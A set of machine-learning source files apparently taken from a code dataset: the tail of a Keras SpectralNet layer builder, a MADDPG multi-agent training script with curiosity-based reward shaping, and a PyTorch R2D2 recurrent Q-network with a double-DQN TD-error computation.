x: an n x d input matrix
name: name of the keras layer
returns: a keras layer instance. during evaluation, the instance returns an n x d orthogonal matrix
if x is full rank and not singular
'''
# get dimensionality of x
d = x.get_shape().as_list()[-1]
# compute orthogonalizing matrix
ortho_weights = Orthogonal_op(x)
# create variable that holds this matrix
ortho_weights_store = K.variable(np.zeros((d,d)))
# create op that saves matrix into variable
ortho_weights_update = tf.assign(ortho_weights_store, ortho_weights, name='ortho_weights_update')
# switch between stored and calculated weights based on training or validation
l = Lambda(lambda x: K.in_train_phase(K.dot(x, ortho_weights), K.dot(x, ortho_weights_store)), name=name)
l.add_update(ortho_weights_update)
return l
def stack_layers(inputs, layers, kernel_initializer='glorot_uniform'):
'''
Builds the architecture of the network by applying each layer specified in layers to inputs.
inputs: a dict containing input_types and input_placeholders for each key and value pair, respectively.
for spectralnet, this means the input_types 'Embedding' and 'Orthogonal'*
layers: a list of dicts containing all layers to be used in the network, where each dict describes
one such layer. each dict requires the key 'type'. all other keys are dependent on the layer
type
kernel_initializer: initialization configuration passed to keras (see keras initializers)
returns: outputs, a dict formatted in much the same way as inputs. it contains input_types and
output_tensors for each key and value pair, respectively, where output_tensors are
the outputs of the input_placeholders in inputs after each layer in layers is applied
* this is necessary since spectralnet takes multiple inputs and performs special computations on the
orthogonal layer
'''
outputs = dict()
for key in inputs:
outputs[key]=inputs[key]
for layer in layers:
# check for l2_reg argument
l2_reg = layer.get('l2_reg')
if l2_reg:
l2_reg = l2(layer['l2_reg'])
# create the layer
if layer['type'] == 'softplus_reg':
l = Dense(layer['size'], activation='softplus', kernel_initializer=kernel_initializer, kernel_regularizer=l2(0.001), name=layer.get('name'))
elif layer['type'] == 'softplus':
l = Dense(layer['size'], activation='softplus', kernel_initializer=kernel_initializer, kernel_regularizer=l2_reg, name=layer.get('name'))
elif layer['type'] == 'softmax':
l = Dense(layer['size'], activation='softmax', kernel_initializer=kernel_initializer, kernel_regularizer=l2_reg, name=layer.get('name'))
elif layer['type'] == 'tanh':
l = Dense(layer['size'], activation='tanh', kernel_initializer=kernel_initializer, kernel_regularizer=l2_reg, name=layer.get('name'))
elif layer['type'] == 'relu':
l = Dense(layer['size'], activation='relu', kernel_initializer=kernel_initializer, kernel_regularizer=l2_reg, name=layer.get('name'))
elif layer['type'] == 'selu':
l = Dense(layer['size'], activation='selu', kernel_initializer=kernel_initializer, kernel_regularizer=l2_reg, name=layer.get('name'))
elif layer['type'] == 'Conv2D':
l = Conv2D(layer['channels'], kernel_size=layer['kernel'], activation='relu', data_format='channels_last', kernel_regularizer=l2_reg, name=layer.get('name'))
elif layer['type'] == 'BatchNormalization':
l = BatchNormalization(name=layer.get('name'))
elif layer['type'] == 'MaxPooling2D':
l = MaxPooling2D(pool_size=layer['pool_size'], data_format='channels_first', name=layer.get('name'))
elif layer['type'] == 'Dropout':
l = Dropout(layer['rate'], name=layer.get('name'))
elif layer['type'] == 'Flatten':
l = Flatten(name=layer.get('name'))
elif layer['type'] == 'Orthogonal':
l = Orthogonal(outputs['Orthogonal'], name=layer.get('name'));
else:
raise ValueError("Invalid layer type '{}'".format(layer['type']))
# apply the layer to each input in inputs
for k in outputs:
outputs[k]=l(outputs[k])
return outputs
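# Illustrative layer specification for stack_layers (the sizes and names here are made-up examples):
# layers_spec = [
#     {'type': 'relu', 'size': 1024, 'l2_reg': 1e-4, 'name': 'hidden1'},
#     {'type': 'tanh', 'size': 10, 'name': 'embedding'},
#     {'type': 'Orthogonal', 'name': 'ortho'},
# ]
# outputs = stack_layers(inputs, layers_spec)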
``` |
{
"source": "2015211289/multiagnet-RL-",
"score": 2
} |
#### File: maddpg_impl/experiments/train.py
```python
import argparse
import numpy as np
import os
# use GPU or not
# if network is small and shallow, CPU may be faster than GPU
os.environ["CUDA_VISIBLE_DEVICES"]="-1"
import tensorflow as tf
import time
import pickle
import maddpg.common.tf_util as U
from maddpg.trainer.maddpg import MADDPGAgentTrainer
import tensorflow.contrib.layers as layers
from tensorflow.contrib import rnn
from reward_shaping.embedding_model import EmbeddingModel
from reward_shaping.config import Config
from multiagent.multi_discrete import MultiDiscrete
from pyinstrument import Profiler
def parse_args():
parser = argparse.ArgumentParser("Reinforcement Learning experiments for multiagent environments")
# Environment
parser.add_argument("--scenario", type=str, default="simple_reference", help="name of the scenario script")
parser.add_argument("--max-episode-len", type=int, default=2000, help="maximum episode length")
parser.add_argument("--num-episodes", type=int, default=500, help="number of episodes")
parser.add_argument("--num-adversaries", type=int, default=0, help="number of adversaries")
parser.add_argument("--good-policy", type=str, default="matd3", help="policy for good agents")
parser.add_argument("--adv-policy", type=str, default="matd3", help="policy of adversaries")
# Core training parameters
parser.add_argument("--lr", type=float, default=1e-4, help="learning rate for Adam optimizer")
parser.add_argument("--gamma", type=float, default=0.95, help="discount factor")
parser.add_argument("--batch-size", type=int, default=1024, help="number of episodes to optimize at the same time")
parser.add_argument("--num-units", type=int, default=256, help="number of units in the mlp")
# Checkpointing
parser.add_argument("--exp-name", type=str, default="test", help="name of the experiment")
parser.add_argument("--save-dir", type=str, default="./policy/", help="directory in which training state and model should be saved")
parser.add_argument("--save-rate", type=int, default=1, help="save model once every time this many episodes are completed")
parser.add_argument("--load-dir", type=str, default="./policy/", help="directory in which training state and model are loaded")
# Evaluation
parser.add_argument("--restore", action="store_true", default=False)
parser.add_argument("--display", action="store_true", default=False)
parser.add_argument("--benchmark", action="store_true", default=False)
parser.add_argument("--benchmark-iters", type=int, default=100000, help="number of iterations run for benchmarking")
parser.add_argument("--benchmark-dir", type=str, default="./benchmark_files/", help="directory where benchmark data is saved")
parser.add_argument("--plots-dir", type=str, default="./complex_game/", help="directory where plot data is saved")
parser.add_argument("--reward-shaping-ag", action="store_true", default=False, help="whether enable reward shaping of agents")
parser.add_argument("--reward-shaping-adv", action="store_true", default=False, help="whether enable reward shaping of adversaries")
parser.add_argument("--policy_noise", default=0.2,type=float)
parser.add_argument("--noise_clip", default=0.2,type=float)
parser.add_argument("--policy_freq", default=2, type=int)
parser.add_argument("--pettingzoo", action="store_true", default=False)
parser.add_argument("--start_timesteps", default=10, type=int)
return parser.parse_args()
def mlp_model(input, num_outputs, scope, reuse=False, num_units=64, rnn_cell=None):
# This model takes as input an observation and returns values of all actions
with tf.variable_scope(scope, reuse=reuse):
out = input
out = layers.fully_connected(out, num_outputs=num_units, activation_fn=tf.nn.relu)
out = layers.fully_connected(out, num_outputs=num_units//2, activation_fn=tf.nn.relu)
out = layers.fully_connected(out, num_outputs=num_outputs, activation_fn=None)
return out
def make_env(scenario_name, arglist, benchmark=False):
from multiagent.environment import MultiAgentEnv
import multiagent.scenarios as scenarios
from experiments.pz import create_env
print("env is ",arglist.scenario)
if arglist.pettingzoo:
env = create_env(arglist.scenario)
# arglist.num_adversaries = 0
print("adversary agents number is {}".format(arglist.num_adversaries))
return env
# load scenario from script
scenario = scenarios.load(scenario_name + ".py").Scenario()
# create world
world = scenario.make_world()
try:
arglist.num_adversaries = len(scenario.adversaries(world))
except:
if arglist.scenario == 'simple_push':
arglist.num_adversaries = 1
else:
arglist.num_adversaries = 0
arglist.reward_shaping_adv = False
print("adversary agents number is {}".format(arglist.num_adversaries))
# create multiagent environment
if benchmark:
env = MultiAgentEnv(world, scenario.reset_world, scenario.reward, scenario.observation, scenario.benchmark_data)
else:
env = MultiAgentEnv(world, scenario.reset_world, scenario.reward, scenario.observation)
return env
def get_trainers(env, num_adversaries, obs_shape_n, arglist, agents):
trainers = []
model = mlp_model
trainer = MADDPGAgentTrainer
if not arglist.pettingzoo:
for i in range(num_adversaries):
trainers.append(trainer(
"agent_%d" % i, model, obs_shape_n, env.action_space, i, arglist,
local_q_func=(arglist.adv_policy=='ddpg'),agent=None))
for i in range(num_adversaries, env.n):
trainers.append(trainer(
"agent_%d" % i, model, obs_shape_n, env.action_space, i, arglist,
local_q_func=(arglist.good_policy=='ddpg'),agent=None))
else:
trainers.append(trainer(
"agent_%d" % 0, model, obs_shape_n, env.action_spaces.values(), 0, arglist,
local_q_func=(arglist.adv_policy=='ddpg'),agent=agents[0]))
trainers.append(trainer(
"agent_%d" % 1, model, obs_shape_n, env.action_spaces.values(), 1, arglist,
local_q_func=(arglist.good_policy=='ddpg'),agent=agents[1]))
return trainers
def create_dirs(arglist):
import os
os.makedirs(os.path.dirname(arglist.benchmark_dir), exist_ok=True)
os.makedirs(os.path.dirname(arglist.plots_dir), exist_ok=True)
def transform_obs_n(obs_n):
import torch
input = obs_n[0]
for i in range(1, len(obs_n)):
input = np.append(input, obs_n[i])
return torch.from_numpy(input).float()
def train(arglist):
with U.single_threaded_session():
# Create environment
env = make_env(arglist.scenario, arglist, arglist.benchmark)
# Create agent trainers
if not arglist.pettingzoo:
            agents = None
            obs_shape_n = [env.observation_space[i].shape for i in range(env.n)]
action_shape_n = []
for i in range(env.n):
if hasattr(env.action_space[i],"n"):
action_shape_n.append(env.action_space[i].n)
elif not isinstance(env.action_space[i],MultiDiscrete):
action_shape_n.append(env.action_space[i].shape)
else:
num = 0
for j in range(len(env.action_space[i].high)):
num+=(env.action_space[i].high[j]-env.action_space[i].low[j]+1)
action_shape_n.append(num)
else:
agents = [agent for agent in (env.possible_agents)]
obs_shape_n = [env.observation_spaces[agent].shape for agent in agents]
action_shape_n = []
for agent in agents:
if hasattr(env.action_spaces[agent],"n"):
action_shape_n.append(env.action_spaces[agent].n)
else:
action_shape_n.append(env.action_spaces[agent].shape)
num_adversaries = min(99, arglist.num_adversaries)
trainers = get_trainers(env, num_adversaries, obs_shape_n, arglist, agents)
print('Using good policy {} and adv policy {}'.format(arglist.good_policy, arglist.adv_policy))
# Initialize
U.initialize()
# Load previous results, if necessary
if arglist.load_dir == "":
arglist.load_dir = arglist.save_dir
if arglist.restore or arglist.benchmark:
print('Loading previous state...')
U.load_state(arglist.load_dir)
# create dirs for saving benchmark data and reward data
create_dirs(arglist)
episode_rewards = [0.0] # sum of rewards for all agents
episode_original_rewards = [0.0] # sum of original rewards for all agents
if not arglist.pettingzoo:
agent_rewards = [[0.0] for _ in range(env.n)] # individual agent reward
agent_original_rewards = [[0.0] for _ in range(env.n)] # individual original agent reward
else:
agent_rewards = [[0.0] for _ in env.possible_agents]
agent_original_rewards = [[0.0] for _ in env.possible_agents] # individual original agent reward
final_ep_rewards = [] # sum of rewards for training curve
final_ep_ag_rewards = [] # agent rewards for training curve
agent_info = [[[]]] # placeholder for benchmarking info
saver = tf.train.Saver()
if not arglist.pettingzoo:
obs_n = env.reset()
else:
from experiments.pz import reset
obs_n = reset(env,agents)
# obs_n=[]
# for agent in agents:
# obs_n.append(t[agent])
episode_step = 0
train_step = 0
# two teams embedding network
embedding_model_adv = EmbeddingModel(obs_size=obs_shape_n[0:num_adversaries], num_outputs=action_shape_n[0:num_adversaries])
embedding_model_ag = EmbeddingModel(obs_size=obs_shape_n[num_adversaries:], num_outputs=action_shape_n[num_adversaries:])
episodic_memory_adv = []
episodic_memory_ag = []
if arglist.reward_shaping_adv:
episodic_memory_adv.append(embedding_model_adv.embedding(transform_obs_n(obs_n[0:num_adversaries])))
if arglist.reward_shaping_ag:
episodic_memory_ag.append(embedding_model_ag.embedding(transform_obs_n(obs_n[num_adversaries:])))
t_start = time.time()
print('Starting iterations...')
# profiler = Profiler()
# profiler.start()
while True:
# get action: possibility distribution
# env.render()
action_n=[]
if len(episode_rewards) < arglist.start_timesteps and not arglist.restore:
for agent,shape in zip(trainers,action_shape_n):
action = np.random.rand(shape)
action = action / np.sum(action)
action_n.append((action,agent.agent))
else:
action_n = [(agent.action(obs),agent.agent) for agent, obs in zip(trainers,obs_n)]
# environment step
if not arglist.pettingzoo:
new_obs_n, rew_n, done_n, info_n = env.step(action_n)
else:
from experiments.pz import step
                # guard against environment exceptions
try:
new_obs_n, rew_n, done_n, info_n = step(action_n,env)
except Exception as e:
print(repr(e))
from experiments.pz import reset
obs_n = reset(env,agents)
continue
original_rew_n = rew_n.copy()
action_n = [action for action,agent in action_n]
# add reward shaping
if arglist.reward_shaping_adv == True:
new_obs_tensor = transform_obs_n(new_obs_n[0:num_adversaries])
next_state_emb_adv = embedding_model_adv.embedding(new_obs_tensor)
intrinsic_reward_adv = embedding_model_adv.compute_intrinsic_reward(episodic_memory_adv, next_state_emb_adv,new_obs_tensor)
episodic_memory_adv.append(next_state_emb_adv)
for i in range(0,num_adversaries):
# can add life long curiosity
rew_n[i] += Config.beta *intrinsic_reward_adv
if arglist.reward_shaping_ag == True:
new_obs_tensor = transform_obs_n(new_obs_n[num_adversaries:])
next_state_emb_ag = embedding_model_ag.embedding(new_obs_tensor)
intrinsic_reward_ag = embedding_model_ag.compute_intrinsic_reward(episodic_memory_ag, next_state_emb_ag,new_obs_tensor)
episodic_memory_ag.append(next_state_emb_ag)
if not arglist.pettingzoo:
for i in range(num_adversaries,env.n):
rew_n[i] += Config.beta * intrinsic_reward_ag
else:
for i in range(num_adversaries,len(env.possible_agents)):
rew_n[i] += Config.beta * intrinsic_reward_ag
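            # Reward mixing used above (a sketch of the shaping scheme, not an extra computation):
            # each agent's extrinsic reward is augmented as r_i <- r_i + Config.beta * r_intrinsic,
            # where r_intrinsic is the episodic-novelty bonus computed from distances in the
            # learned embedding space (NGU-style reward shaping).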
episode_step += 1
done = all(done_n)
terminal = (episode_step >= arglist.max_episode_len)
# collect experience
for i, agent in enumerate(trainers):
agent.experience(obs_n[i], action_n[i], rew_n[i], new_obs_n[i], done_n[i], terminal)
obs_n = new_obs_n
for i, rew in enumerate(rew_n):
episode_rewards[-1] += rew
episode_original_rewards[-1] += original_rew_n[i]
agent_rewards[i][-1] += rew
agent_original_rewards[i][-1] += original_rew_n[i]
if done or terminal:
terminal = True
# obs_n = env.reset()
if not arglist.pettingzoo:
obs_n = env.reset()
else:
from experiments.pz import reset
obs_n = reset(env,agents)
episode_step = 0
episode_rewards.append(0)
episode_original_rewards.append(0)
for a in agent_rewards:
a.append(0)
for a in agent_original_rewards:
a.append(0)
agent_info.append([[]])
# reset episode embedding network
episodic_memory_adv.clear()
# embedding_model_adv.lastReward=0
episodic_memory_ag.clear()
# embedding_model_ag.lastReward=0
if arglist.reward_shaping_adv:
episodic_memory_adv.append(embedding_model_adv.embedding(transform_obs_n(obs_n[0:num_adversaries])))
if arglist.reward_shaping_ag:
episodic_memory_ag.append(embedding_model_ag.embedding(transform_obs_n(obs_n[num_adversaries:])))
# increment global step counter
train_step += 1
# for benchmarking learned policies
if arglist.benchmark:
for i, info in enumerate(info_n):
agent_info[-1][i].append(info_n['n'])
if train_step > arglist.benchmark_iters and (done or terminal):
file_name = arglist.benchmark_dir + arglist.exp_name + '.pkl'
print('Finished benchmarking, now saving...')
with open(file_name, 'wb') as fp:
pickle.dump(agent_info[:-1], fp)
break
continue
# for displaying learned policies
if arglist.display:
# time.sleep(0.1)
env.render()
if arglist.restore:
continue
# update all trainers, if not in display or benchmark mode
loss = None
for agent in trainers:
agent.preupdate()
for agent in trainers:
loss = agent.update(trainers, train_step)
# train embedding network
obs_n_train = []
obs_next_n_train = []
act_n_train = []
if (arglist.reward_shaping_adv or arglist.reward_shaping_ag):
if arglist.reward_shaping_adv == True and train_step > Config.train_episode_num * 10:
for i in range(0,num_adversaries):
obs, act, rew, obs_next, done = trainers[i].sample(Config.train_episode_num)
obs_n_train.append(obs)
obs_next_n_train.append(obs_next)
act_n_train.append(act)
embedding_loss_adv = embedding_model_adv.train_model(obs_n_train,obs_next_n_train,act_n_train)
if arglist.reward_shaping_ag == True and train_step > Config.train_episode_num * 10:
obs_n_train = []
obs_next_n_train = []
act_n_train = []
n = 0
if not arglist.pettingzoo:
n= env.n
else:
n= len(env.possible_agents)
for i in range(num_adversaries,n):
obs, act, rew, obs_next, done = trainers[i].sample(Config.train_episode_num)
obs_n_train.append(obs)
obs_next_n_train.append(obs_next)
act_n_train.append(act)
embedding_loss_ag = embedding_model_ag.train_model(obs_n_train,obs_next_n_train,act_n_train)
# save model, display training output
if (terminal) and (len(episode_rewards) % arglist.save_rate == 0):
U.save_state(arglist.save_dir, saver=saver)
# print statement depends on whether or not there are adversaries
if num_adversaries == 0:
print("steps: {}, episodes: {}, mean episode reward: {}, {}, time: {}".format(
train_step, len(episode_rewards)-1, np.mean(episode_original_rewards[-arglist.save_rate-1:-1]),
np.mean(episode_rewards[-arglist.save_rate-1:-1]), round(time.time()-t_start, 3)))
else:
print("steps: {}, episodes: {}, mean episode reward: {}, agent episode reward: {}, {}, time: {}".format(
train_step, len(episode_rewards)-1, np.mean(episode_original_rewards[-arglist.save_rate-1:-1]),
[np.mean(rew[-arglist.save_rate-1:-1]) for rew in agent_original_rewards],
[np.mean(rew[-arglist.save_rate-1:-1]) for rew in agent_rewards],
round(time.time()-t_start, 3)))
# profiler.stop()
# profiler.print()
# if arglist.reward_shaping_adv:
# print("adv agent original episode reward: {}".format(
# [np.mean(rew[-arglist.save_rate:]) for rew in agent_rewards[0:num_adversaries]]
# ))
# if arglist.reward_shaping_ag:
# print("agent original episode reward: {}".format(
# [np.mean(rew[-arglist.save_rate:]) for rew in agent_original_rewards[num_adversaries:env.n]]
# ))
t_start = time.time()
# Keep track of final episode reward
final_ep_rewards.append(np.mean(episode_original_rewards[-arglist.save_rate-1:-1]))
for rew in agent_original_rewards:
final_ep_ag_rewards.append(np.mean(rew[-arglist.save_rate-1:-1]))
# saves final episode reward for plotting training curve later
if len(episode_rewards) > arglist.num_episodes:
rew_file_name = arglist.plots_dir + arglist.exp_name + '_rewards.pkl'
with open(rew_file_name, 'wb') as fp:
pickle.dump(final_ep_rewards, fp)
agrew_file_name = arglist.plots_dir + arglist.exp_name + '_agrewards.pkl'
with open(agrew_file_name, 'wb') as fp:
pickle.dump(final_ep_ag_rewards, fp)
print('...Finished total of {} episodes.'.format(len(episode_rewards)))
break
if __name__ == '__main__':
arglist = parse_args()
train(arglist)
```
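The loop above maintains per-episode embedding memories (`episodic_memory_adv`, `episodic_memory_ag`) and trains separate embedding models for reward shaping, but the intrinsic-reward computation itself lives elsewhere in the repository. Purely as an illustration, here is a minimal sketch of an NGU-style episodic bonus computed from such a memory; the function name, the kernel constants, and the use of plain NumPy arrays are assumptions made for the sketch, not code from this project.
```python
import numpy as np

def episodic_bonus(embedding, memory, k=10, eps=1e-3, c=1e-3):
    """Hypothetical NGU-style bonus: small when the current embedding is close to
    many embeddings already stored this episode, large when it is novel."""
    if len(memory) == 0:
        return 1.0
    sq_dists = np.array([float(np.sum((embedding - m) ** 2)) for m in memory])
    knn = np.sort(sq_dists)[:k]            # k nearest squared distances
    d_norm = knn.mean() + 1e-8             # normaliser (a running mean in the paper)
    kernel = eps / (knn / d_norm + eps)    # inverse-kernel similarities
    return 1.0 / np.sqrt(kernel.sum() + c)
```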
{
"source": "2015211289/R2D2-ngu",
"score": 3
}
#### File: 2015211289/R2D2-ngu/model.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from config import config
class R2D2(nn.Module):
def __init__(self, num_inputs, num_outputs):
super(R2D2, self).__init__()
self.num_inputs = num_inputs
self.num_outputs = num_outputs
self.lstm = nn.LSTM(input_size=num_inputs, hidden_size=config.hidden_size, batch_first=True)
self.fc = nn.Linear(config.hidden_size, 128)
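        # Dueling heads: fc_adv outputs one advantage per action, fc_val a single state value.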
self.fc_adv = nn.Linear(128, num_outputs)
self.fc_val = nn.Linear(128, 1)
def forward(self, x, hidden=None):
# x [batch_size, sequence_length, num_inputs]
batch_size = x.size()[0]
sequence_length = x.size()[1]
out, hidden = self.lstm(x, hidden)
out = F.relu(self.fc(out))
adv = self.fc_adv(out)
adv = adv.view(batch_size, sequence_length, self.num_outputs)
val = self.fc_val(out)
val = val.view(batch_size, sequence_length, 1)
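        # Dueling aggregation: Q(s, a) = V(s) + A(s, a) - mean_a A(s, a)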
qvalue = val + (adv - adv.mean(dim=2, keepdim=True))
return qvalue, hidden
@classmethod
def get_td_error(cls, online_net, target_net, batch, lengths):
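        # The first config.burn_in_length steps of each stored sequence only warm up the
        # LSTM state; slice_burn_in drops them so they do not contribute to the loss.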
def slice_burn_in(item):
return item[:, config.burn_in_length :, :]
batch_size = torch.stack(batch.state).size()[0]
states = torch.stack(batch.state).view(batch_size, config.sequence_length, online_net.num_inputs)
next_states = torch.stack(batch.next_state).view(batch_size, config.sequence_length, online_net.num_inputs)
actions = torch.stack(batch.action).view(batch_size, config.sequence_length, -1).long()
rewards = torch.stack(batch.reward).view(batch_size, config.sequence_length, -1)
masks = torch.stack(batch.mask).view(batch_size, config.sequence_length, -1)
steps = torch.stack(batch.step).view(batch_size, config.sequence_length, -1)
rnn_state = torch.stack(batch.rnn_state).view(batch_size, config.sequence_length, 2, -1)
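        # rnn_state stores two (h, c) pairs per sequence: index 0 initialises the online net
        # on states, index 1 initialises the nets evaluated on next_states.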
[h0, c0] = rnn_state[:, 0, :, :].transpose(0, 1)
h0 = h0.unsqueeze(0).detach()
c0 = c0.unsqueeze(0).detach()
[h1, c1] = rnn_state[:, 1, :, :].transpose(0, 1)
h1 = h1.unsqueeze(0).detach()
c1 = c1.unsqueeze(0).detach()
pred, _ = online_net(states, (h0, c0))
next_pred, _ = target_net(next_states, (h1, c1))
next_pred_online, _ = online_net(next_states, (h1, c1))
pred = slice_burn_in(pred)
next_pred = slice_burn_in(next_pred)
actions = slice_burn_in(actions)
rewards = slice_burn_in(rewards)
masks = slice_burn_in(masks)
steps = slice_burn_in(steps)
next_pred_online = slice_burn_in(next_pred_online)
pred = pred.gather(2, actions)
_, next_pred_online_action = next_pred_online.max(2)
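        # Double-DQN target: the action is chosen by the online net (argmax above) but evaluated
        # by the target net; masks zeroes the bootstrap term at terminal steps and steps holds the
        # per-transition step count used as the discount exponent.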
target = rewards + masks * pow(config.gamma, steps) * next_pred.gather(2, next_pred_online_action.unsqueeze(2))
td_error = pred - target.detach()
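        # Sequences shorter than sequence_length are zero-padded; the loop below zeroes the TD
        # error beyond each sequence's valid (post-burn-in) length so padding does not affect the loss.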
for idx, length in enumerate(lengths):
td_error[idx][length - config.burn_in_length :][:] = 0
return td_error
@classmethod
def train_model(cls, online_net, target_net, optimizer, batch, lengths):
td_error = cls.get_td_error(online_net, target_net, batch, lengths)
loss = pow(td_error, 2).mean()
optimizer.zero_grad()
loss.backward()
optimizer.step()
return loss, td_error
def get_action(self, state, hidden):
state = state.unsqueeze(0).unsqueeze(0)
qvalue, hidden = self.forward(state, hidden)
_, action = torch.max(qvalue, 2)
return action.numpy()[0][0], hidden
```
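A minimal usage sketch for the model above (hypothetical, not part of the repository): it assumes the file is importable as `model`, that `config.hidden_size` is defined in `config.py` as the class expects, and uses toy observation/action sizes.
```python
import torch
from model import R2D2
from config import config

num_inputs, num_actions = 8, 4
online_net = R2D2(num_inputs, num_actions)
target_net = R2D2(num_inputs, num_actions)
target_net.load_state_dict(online_net.state_dict())  # start with the target net in sync

# Recurrent state for a single environment: (h, c), each [num_layers=1, batch=1, hidden_size]
hidden = (torch.zeros(1, 1, config.hidden_size),
          torch.zeros(1, 1, config.hidden_size))

obs = torch.zeros(num_inputs)  # one flat observation
with torch.no_grad():
    action, hidden = online_net.get_action(obs, hidden)
print(action)  # greedy action index for this toy input
```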